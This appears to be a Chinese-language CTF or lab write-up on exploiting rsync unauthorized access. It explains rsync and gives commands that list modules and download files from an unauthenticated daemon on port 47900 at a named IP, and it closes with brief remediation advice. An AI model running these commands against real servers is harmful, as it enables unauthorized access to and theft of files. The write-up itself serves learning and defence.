rsync未授权访问漏洞利用

0x00

这是第一次接触到这个rsync,刚开始还以为是Redis未授权漏洞,竟然还在kali下使用redis-cli来连接23333

在做这一题需要先了解rsync这是个什么东西

传送门1
传送门2

rsync默认端口873

rsync(remote synchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。
rsync默认配置文件为/etc/rsyncd.conf,常驻模式启动命令rsync –daemon,启动成功后默认监听于TCP端口873,可通过rsync-daemon及ssh两种方式进行认证。

0x01

其实主要知道几条命令就行了:

rsync IP::   //这是在默认条件下没有改变默认的端口,默认密码是::
rsync --port=xxx ip::  //如果修改了默认端口就需要指定端口,这里就是需要自己指定47900端口
rsync -avz ip::www /tmp   //-avz是下载文件的命令,前一个是目标内容,后一个是自己指定存储在本地的路径
rsync -avz --port=xxx ip::dddd /tmp

虽然知道了指定的端口,但是用一下nmap扫描一下端口情况

image.png

这里先不指定端口扫描,发现果然采用nmap的默认策略扫描不出来,因为这里修改以后的端口是47900,超出了nmap默认扫描的端口范围。

这里又想起Redis的默认端口6379不会被nmap扫描出来,很僵硬....

接下来直接尝试使用rsync连接啦

rsync --port=47900 219.153.49.228::
rsync --port=47900 219.152.49.228::volume
rsync --port=47900 219.153.49.228::volume/key_1913718524583.php /tmp
image.png

完成~

关于rsync的修复主要就是修改默认端口和设置连接的账户和密码。
详细:https://hok1.github.io/2018/02/03/rsync%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE(%E9%99%84dockerfile/


这里还有一个seebug上的比较全的未授权访问漏洞总结

你可能感兴趣的:(rsync未授权访问漏洞利用)